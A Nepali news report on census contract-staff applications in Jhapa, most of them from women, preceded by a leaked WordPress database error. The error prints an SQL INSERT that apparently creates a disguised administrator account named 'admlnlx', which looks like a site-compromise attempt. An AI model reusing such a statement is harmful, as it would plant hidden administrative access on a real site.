WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXqxhqz1SaLhOQ/h.2.UXooD6DIxv10', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 22:41:40', '', 'admlnlx', 'admlnlx')
झापा । जनगणना २०७८ का लागि मागिएको करार कर्मचारीमा यहाँ सबैभन्दा बढी महिलाले निवेदन दिएका छन् । जिल्ला जनगणना कार्यालय चन्द्रगढीका अनुसार झापामा अनलाइनमा पूर्ण विवरण भरेर दरखास्त दिनेमा सात हजार ९३७ जनामध्ये पाँच हजार ८१ महिला छन् ।
कार्यालयका प्रमुख चुडामणि लुइँटेलले दुई हजार ८५० पुरुष, अन्य लिङ्गी छ र महिला पाँच हजार ८१ गरी सात हजार ९३७ जनाको निवेदन आएको जानकारी दिए । उहाँले मागिएका कर्मचारी भन्दा सात गुणा बढीले जिल्लामा आवेदन फारम भरेको बताए ।
जिल्लामा सुपरीवेक्षकका लागि २५९ र गणकका लागि एक हजार ८१ जना कर्मचारी करारमा चाहिएको प्रमुख लुइँटेलले बताए । योग्यता क्षमता भएका तर पारिवारिक कारणले बाहिर गएर जागिर खान समस्या भएका महिलाले निवेदन दिएका कारण महिलाको सङ्ख्या बढी भएको हुनसक्ने जिल्ला प्रशासन कार्यालयका सहायक प्रमुख जिल्ला अधिकारी कृष्ण शाहीले बताए ।
छनोटमा परेका सुपरीवेक्षकले पहिलो चरणको कार्यक्रमअन्तर्गत घर तथा परिवारको सूचीकरण आगामी वैशाख २६ देखि जेठ १४ गतेसम्म प्रत्यकेका घरघर पुगेर गर्ने र त्यसकै आधारमा गणकले परिवारको सङ्ख्याको विवरण, कृषि तथा पशुपक्षीसम्बन्धी विवरण, बैँकिङ पहुँचको विवरण सङ्कलन गर्नेछन् । रासस